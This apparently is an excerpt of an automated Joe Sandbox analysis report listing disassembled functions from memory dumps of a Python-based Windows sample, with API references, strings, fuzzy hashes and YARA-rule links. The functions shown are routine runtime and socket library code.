SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1692C2
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1692EF

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: d5caf07921151a3b7cd360742ed26b44bddc3b47f5f8b8505a55cd26872c86be
Instruction ID: 81e422cc0ca9e61716f9d3d9608c55266ccea6ad94f5db8140dab1f1a672d3e8
Opcode Fuzzy Hash: d5caf07921151a3b7cd360742ed26b44bddc3b47f5f8b8505a55cd26872c86be
Instruction Fuzzy Hash: 3E311726F09A4287FB489F65A874D382361AF85BA4F444739D93E877DEDF3CA9018604

Function 00007FFE1A492F14 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE1A492F71

Part of subcall function 00007FFE1A4952D0: __GetUnwindTryBlock.LIBCMT ref: 00007FFE1A495313
Part of subcall function 00007FFE1A4952D0: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE1A495338

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A493049
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A493056
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE1A4932A0
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4932CE

Part of subcall function 00007FFE1A4969C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4925CE), ref: 00007FFE1A4969CE

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A493394
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A4933C9

Strings

csm, xrefs: 00007FFE1A492F8B
csm, xrefs: 00007FFE1A49306E
csm, xrefs: 00007FFE1A492FF2

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 4223619315-393685449
Opcode ID: 1fea5c564d133bdba3aecb898f1e2b7bc476544beebca211cb7a23793dbe9004
Instruction ID: 079a334e5a0b77dcca762db2ae7360d4a6a1b7ef163ef8b149262e74b38f3128
Opcode Fuzzy Hash: 1fea5c564d133bdba3aecb898f1e2b7bc476544beebca211cb7a23793dbe9004
Instruction Fuzzy Hash: 7BE15172B08B4186EB309F6694442BD77A4FB49BA8F1011BADE4E57B65CF38E5B4C700

Function 00007FFDFF19C700 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 230COMMONLIBRARYCODE

Download Yara Rule

Strings

`generic-class-parameter-, xrefs: 00007FFDFF19C991
`template-type-parameter-, xrefs: 00007FFDFF19C9A1
NULL, xrefs: 00007FFDFF19C7B3
`generic-method-parameter-, xrefs: 00007FFDFF19C94D

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID:
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-
API String ID: 0-4167119577
Opcode ID: d75f0c1a294e6937a3bc756fe126f056db90dbff4f35f65fb7689ccf23d0feee
Instruction ID: 62e14b44ae4df8517971b8d99dd510a149ca37d768a7d5c95665b344f0d5883a
Opcode Fuzzy Hash: d75f0c1a294e6937a3bc756fe126f056db90dbff4f35f65fb7689ccf23d0feee
Instruction Fuzzy Hash: B8B13523F1865688FB209F61D875BFC2371AF44748F840236DA7D526EEDF6CA6048381

Function 00007FFE1A49E72C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 192COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A49E786

Strings

template-parameter-, xrefs: 00007FFE1A49E7E8
generic-type-, xrefs: 00007FFE1A49E82F
`generic-type-, xrefs: 00007FFE1A49E862
`template-parameter-, xrefs: 00007FFE1A49E81B

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Replicator::operator[]
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 3676697650-3207858774
Opcode ID: ecd4a8ae6d7230611fff1dd4e64a59f99909a897cce7822f33257ee1ddf9a1a8
Instruction ID: 03d330f2ad740f550ff4cc1d14e5d9d386f85a185bfc3a3ec7f1725fbbce25d5
Opcode Fuzzy Hash: ecd4a8ae6d7230611fff1dd4e64a59f99909a897cce7822f33257ee1ddf9a1a8
Instruction Fuzzy Hash: B8917B62B08F9689EB70CF26D4412B867A1AB88B64F5441F3DA5E036B5DF3CE575C340

Function 00007FF6399B20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6399B211B
SelectObject.GDI32 ref: 00007FF6399B2162
DrawTextW.USER32 ref: 00007FF6399B2185
SelectObject.GDI32 ref: 00007FF6399B219B
ReleaseDC.USER32 ref: 00007FF6399B21AB
MoveWindow.USER32 ref: 00007FF6399B21FB
MoveWindow.USER32 ref: 00007FF6399B223B
MoveWindow.USER32 ref: 00007FF6399B228E
MoveWindow.USER32 ref: 00007FF6399B22D6

Strings

P%, xrefs: 00007FF6399B216F

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
Instruction ID: fa8e9d4263bfe59c2a42506e995e169acd11e49ed0ba84de262ca2074e937121
Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
Instruction Fuzzy Hash: F35109266087A186D6349F26E4581BAB7A2FB98B61F044135EFDE83789DF3CD085DB10

Function 00007FFE14634D64 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FFE14634D98
getsockopt.WS2_32 ref: 00007FFE14634DD3
PyLong_FromLong.PYTHON311 ref: 00007FFE14634DE1
PyBytes_FromStringAndSize.PYTHON311 ref: 00007FFE14634DFB
getsockopt.WS2_32 ref: 00007FFE14634E26
_Py_Dealloc.PYTHON311 ref: 00007FFE14634E3B
_PyBytes_Resize.PYTHON311 ref: 00007FFE14634E50

Strings

ii|i:getsockopt, xrefs: 00007FFE14634D84
getsockopt buflen out of range, xrefs: 00007FFE14634E64

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Bytes_FromSizegetsockopt$Arg_DeallocLongLong_ParseResizeStringTuple_
String ID: getsockopt buflen out of range$ii|i:getsockopt
API String ID: 3532181676-2750947780
Opcode ID: 5785f4cf953136ff891c5de31f97a1d637a2e9c32d7ff5d57b7af9cd89455eeb
Instruction ID: 954435105dd79f551f20cdccd3b8e7f1e87a4f7a4b89ff8d3c2f50d64b02c775
Opcode Fuzzy Hash: 5785f4cf953136ff891c5de31f97a1d637a2e9c32d7ff5d57b7af9cd89455eeb
Instruction Fuzzy Hash: 21310176A1CE82C3EB14CB66E59416AB3B0FB85B68B101175EA4E43774DF3CD409CB80

Function 00007FFE14635844 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON311 ref: 00007FFE1463588F
PyBuffer_Release.PYTHON311 ref: 00007FFE146358A8
PyErr_SetString.PYTHON311 ref: 00007FFE146358BF
PyBuffer_Release.PYTHON311 ref: 00007FFE146358F7
PyBuffer_Release.PYTHON311 ref: 00007FFE1463590B
PyBuffer_Release.PYTHON311 ref: 00007FFE1463591A
PyLong_FromSsize_t.PYTHON311 ref: 00007FFE14635923

Strings

w*|ni:recv_into, xrefs: 00007FFE14635862
negative buffersize in recv_into, xrefs: 00007FFE146358AE
buffer too small for requested bytes, xrefs: 00007FFE14635911

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Buffer_Release$Arg_Err_FromKeywords_Long_ParseSizeSsize_tStringTuple
String ID: buffer too small for requested bytes$negative buffersize in recv_into$w*|ni:recv_into
API String ID: 1544103690-1758107600
Opcode ID: bb841344f6b950a1e502b2b33d21ba6556dc602b5f6c03b78a2cc81f19126a85
Instruction ID: 4e3eca140513220ca86ff3871f94fac31252b5a7c63d5d4243fae2a5e5abc774
Opcode Fuzzy Hash: bb841344f6b950a1e502b2b33d21ba6556dc602b5f6c03b78a2cc81f19126a85
Instruction Fuzzy Hash: A1212C71A0CF9281EB108B53E8842B973A4FB9A7A8F400576D99E43765DF3CE55CC780

Function 00007FFE146322A0 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFE146322C8
__scrt_initialize_crt.LIBCMT ref: 00007FFE1463230D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFE1463231A
_RTC_Initialize.LIBCMT ref: 00007FFE14632348
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFE1463236E
__scrt_release_startup_lock.LIBCMT ref: 00007FFE14632399

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 9bbd730a66e4cbb51c460212e6bb78fa7447f27bb902fb331a2f3e6d0f89718b
Instruction ID: 6775f5f72c109f545b4ec92cb21b7f1c6a2dc6ea735815fb9f507090178071c1
Opcode Fuzzy Hash: 9bbd730a66e4cbb51c460212e6bb78fa7447f27bb902fb331a2f3e6d0f89718b
Instruction Fuzzy Hash: E1817061E0CE8786FB509B2794D12B92290AF87BACF0444B5D90D437B6DE3CE94DC790

Function 00007FFDFF176BB0 Relevance: 16.6, APIs: 11, Instructions: 82threadCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF176BC6
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF176BD4
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF176BE8
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF176C08
FreeLibraryAndExitThread.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF176C57
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF176C62
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF176C8B
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF176CA0

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast$ExitFreeLibraryThread
String ID:
API String ID: 508117893-0
Opcode ID: 580b53068f0080d0d9033f2910b561d1e370e0a15cab5eee6688d82db152d996
Instruction ID: 7ac9c82644271d629cf2af5c6fc5593588ba2467809ae135ff373104cc13980a
Opcode Fuzzy Hash: 580b53068f0080d0d9033f2910b561d1e370e0a15cab5eee6688d82db152d996
Instruction Fuzzy Hash: 70310822F0DA4386FF589B24A874E383351AF95BB0F144734D97E866EEDF6CA5458300

Function 00007FFE1A49A4E8 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49A542
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49A678

Strings

union , xrefs: 00007FFE1A49A6A5
`unknown ecsu', xrefs: 00007FFE1A49A50E
cointerface , xrefs: 00007FFE1A49A61F
coclass , xrefs: 00007FFE1A49A631
enum , xrefs: 00007FFE1A49A63A
struct , xrefs: 00007FFE1A49A69C
class , xrefs: 00007FFE1A49A68D

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 2943138195-1464470183
Opcode ID: f2c82fd6e231fdf3051f437846c0782e2719a4821ee929760b6b2afc08469b6e
Instruction ID: 6bdf5e64a3e9d4da67b95f376d398faf2fe6a4e8b771d22e863ff2991927c96e
Opcode Fuzzy Hash: f2c82fd6e231fdf3051f437846c0782e2719a4821ee929760b6b2afc08469b6e
Instruction Fuzzy Hash: 15514D61F18A6689FB20CF66E8401BC27B0BB18B64F5041B6DA4E57A74DF39E976C700

Function 00007FFDFF199C78 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF199CD4

Part of subcall function 00007FFDFF196FB0: DName::operator+=.LIBVCRUNTIME ref: 00007FFDFF196FCB

Part of subcall function 00007FFDFF199E60: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF199F3D

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF199E01

Strings

`unknown ecsu', xrefs: 00007FFDFF199CA0
class , xrefs: 00007FFDFF199E16
cointerface , xrefs: 00007FFDFF199DA8
union , xrefs: 00007FFDFF199E2E
enum , xrefs: 00007FFDFF199DC3
coclass , xrefs: 00007FFDFF199DBA
struct , xrefs: 00007FFDFF199E25

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+$Name::operator+=
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 179159573-1464470183
Opcode ID: 123fa5a7bbeefb1f99196980d49f1579772984d2ed2af859b650b9bcf8c746b5
Instruction ID: cfb94aca4374e9a6a6c07b8448d371597cabd4cca64c6554df9bc1c6677ca783
Opcode Fuzzy Hash: 123fa5a7bbeefb1f99196980d49f1579772984d2ed2af859b650b9bcf8c746b5
Instruction Fuzzy Hash: 39513C32F1861289F724CF64D8A09BC37B0BB05788F945235DE2D96ADDDF39A5418780

Function 00007FFE1A498BA4 Relevance: 15.2, APIs: 10, Instructions: 150COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A498C6E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A498C7E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A498CCA
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A498CDA
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A498CEA
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A498D5D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A498D6E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A498D80
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A498DAC
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A498DBB

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: ea53d01b8add9f065da6da89440d1b5514e5cb284af6834d09ce1e9fb4639f71
Instruction ID: de968a00a2348c9232a091087010b90e9be961e3bd8289381b7d68127db27c5c
Opcode Fuzzy Hash: ea53d01b8add9f065da6da89440d1b5514e5cb284af6834d09ce1e9fb4639f71
Instruction Fuzzy Hash: 2C616162B04B52D8FB21DBA5D8401FC37B1BB08BA8F5044B6DE0E6BA69DF78D565C340

Function 00007FFDFF1984A0 Relevance: 15.2, APIs: 10, Instructions: 150COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19856A
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19857A
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF1985C6
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF1985D6
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF1985E6
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF198659
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19866A
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19867C
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF1986A8
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF1986B7

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 62ad426f42c09a2d13bd2e3653c9cfc29f0f87792ced03e87d30f7dc9c55c2d2
Instruction ID: e8877c6013e9e1baf90cca533acc762cb947248097c4ba5e8a9877b6cdb6df5e
Opcode Fuzzy Hash: 62ad426f42c09a2d13bd2e3653c9cfc29f0f87792ced03e87d30f7dc9c55c2d2
Instruction Fuzzy Hash: 8D614963F14A6698FB10DFA0D8A05EC27B1BB4479CB804636DE2D6BA8DDF78D545C380

Function 00007FFDFF1691D9 Relevance: 15.1, APIs: 10, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1691EF
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1691FD
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF169211
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF16922B
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF16923E
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF16926C
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF169292
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1692A9
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1692B7
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1692C2

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLastValue
String ID:
API String ID: 1151882462-0
Opcode ID: e834d97ef4ceae10f575991ab56cc91b8a699b70186f55b69c610ede9ab8a10e
Instruction ID: d146397886a5fcc2b2c38656f80344658ffbba829ed6fdc127be136104053bef
Opcode Fuzzy Hash: e834d97ef4ceae10f575991ab56cc91b8a699b70186f55b69c610ede9ab8a10e
Instruction Fuzzy Hash: 03314F26F09A4287FB445F65A878C782361AF85BA4F444339D93E877DEDF2CE9418704

Function 00007FFE14636568 Relevance: 15.1, APIs: 10, Instructions: 59networkCOMMON

Download Yara Rule

APIs

PyLong_AsLongLong.PYTHON311 ref: 00007FFE14636586
PyErr_Occurred.PYTHON311 ref: 00007FFE14636595
GetCurrentProcessId.KERNEL32 ref: 00007FFE146365A0
WSADuplicateSocketW.WS2_32 ref: 00007FFE146365B0
WSASocketW.WS2_32 ref: 00007FFE146365E3
SetHandleInformation.KERNEL32 ref: 00007FFE146365FC
closesocket.WS2_32 ref: 00007FFE14636609
PyErr_SetFromWindowsErr.PYTHON311 ref: 00007FFE14636611
PyLong_FromLongLong.PYTHON311 ref: 00007FFE14636623
closesocket.WS2_32 ref: 00007FFE14636634

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
